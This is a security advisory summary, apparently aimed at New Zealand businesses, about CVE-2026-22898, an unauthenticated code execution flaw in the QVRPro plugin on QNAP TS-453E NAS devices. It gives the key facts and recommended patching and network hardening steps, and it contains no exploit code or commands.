QNAP NAS devices are widely deployed across New Zealand businesses for file storage, backups, and surveillance. A newly disclosed vulnerability in the TS-453E's QVRPro plugin allows unauthenticated attackers on the same network segment to execute arbitrary code — making this a priority patch for any organisation running affected hardware.

What Happened

The Zero Day Initiative has published advisory ZDI-26-292 (CVE-2026-22898), a high-severity vulnerability rated CVSS 8.8 affecting QNAP TS-453E NAS devices. The flaw sits within the QVRPro Plugin, QNAP's video surveillance software, and is classified as an "exposed dangerous method" weakness.

Exploitation does not require authentication. An attacker positioned on an adjacent network — for example, connected to the same office LAN or Wi-Fi — can trigger the vulnerability remotely and execute code in the context of the postgres user account on the device. From there, attackers typically pivot to broader system compromise, data theft, or lateral movement into connected business systems.

The vulnerability was reported to QNAP by researchers at Fuzzinglabs in January 2026 and disclosed publicly on 15 April 2026 after coordinated resolution. QNAP has released a patch alongside security advisory QSA-26-07.

Given that NAS devices frequently hold the most sensitive operational data in SMBs — financial records, client files, and surveillance footage — a code execution flaw with this attack profile represents a realistic path to ransomware deployment or data exfiltration if left unpatched.

Key Takeaways

  • CVE-2026-22898 affects QNAP TS-453E NAS devices running the QVRPro plugin.
  • CVSS score is 8.8 (High); no authentication is required to exploit.
  • Attackers must be network-adjacent — meaning access to the local network is needed, not direct internet exposure.
  • Successful exploitation yields code execution as the postgres database user.
  • QNAP has released a patch via security advisory QSA-26-07.
  • NAS devices exposed to untrusted networks or guest Wi-Fi are at elevated risk.

What NZ Businesses Should Do

  1. Patch immediately. Apply the QNAP firmware and QVRPro plugin updates referenced in QSA-26-07. If you manage NAS devices for clients, prioritise this in your next maintenance window.
  2. Audit your QNAP fleet. Identify all TS-453E units and confirm whether QVRPro is installed. If QVRPro isn't actively used, uninstall it to reduce attack surface.
  3. Segment your NAS devices. Place NAS and surveillance infrastructure on a dedicated VLAN, isolated from guest Wi-Fi, BYOD networks, and general user traffic. This limits which devices can reach the vulnerable service.
  4. Never expose NAS admin or plugin services to the internet. Use a VPN for remote access and confirm that UPnP or port forwarding rules aren't unintentionally exposing management interfaces.
  5. Verify backups are offline or immutable. A compromised NAS is a common ransomware target. Ensure at least one backup copy is air-gapped or stored with write-once protection so recovery is possible even if the primary NAS is compromised.

Source: Read the full article on Zero Day Initiative